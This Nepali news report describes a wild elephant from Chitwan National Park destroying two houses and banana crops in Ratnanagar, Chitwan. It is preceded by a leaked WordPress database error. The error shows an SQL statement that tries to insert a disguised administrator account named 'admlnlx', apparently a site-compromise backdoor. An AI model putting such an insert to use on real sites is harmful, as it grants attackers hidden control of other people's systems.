WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bt9b9noBrEpjalhQ0QRR0XcwW1QBaT1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 14:46:20', '', 'admlnlx', 'admlnlx')
चितवन, माघ १७–
पूर्वी चितवनको रत्ननगर नगरपालिका–१० स्थित शितल टोलमा गयराती जंगली हात्तीले दुई घरमा क्षति पुर्याएको छ ।
चितवन राष्ट्रिय निकुञ्जबाट निश्किएको जंगली हात्तीले पञ्चकन्या सामुदायिक वन नजिकै रहेको सो बस्तीमा क्षति पुर्याएको हो । जंगली हात्तीले स्थानीयको केरा खेतीमा समेत क्षति पुर्याएको स्थानीय रमेश राना मगरले जानकारी दिए । सो हात्ती अझै पनि सामुदायिक वन भित्रै रहेकाले स्थानीयहरु त्रसित अवस्थामा रहेको मगरले बताए ।
जंगली हातीले रुपा कुमाल र सुनिल वि.क .को घर भत्काएको छ । घटनामा कुनै मानिय क्षति भएको छैन् । स्थानीयले रातभर जाग्रामबसी आगो बालेर हात्तीलाई धपाएका थिए ।
चितवनमा जंगली हात्तीले प्रत्येक वर्ष जनधनको क्षति पुर्याउँदै आएको छ ।